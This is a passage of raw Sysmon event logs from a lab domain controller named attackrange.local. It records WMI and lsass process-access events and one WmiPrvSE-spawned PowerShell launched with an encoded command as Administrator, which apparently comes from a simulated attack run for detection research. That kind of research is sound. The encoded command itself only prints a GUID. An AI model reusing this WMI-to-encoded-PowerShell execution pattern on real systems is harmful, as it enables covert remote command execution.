16:53:44.775{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.784{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedC VwByAGkAdABlAC0ASABvAHMAdAAgADQAZABiAGUAOABjADgAZAAtADcAZgA1ADIALQA0AGEAMAA2AC0AOQAyAGQAYQAtAGYANQA4AGEANgA3ADEAMwA2ADEAZAAyAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002238989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.770{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A0AA-00000000AD01}5488C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9EAA-00000000AD01}1096C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9CAA-00000000AD01}13052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPC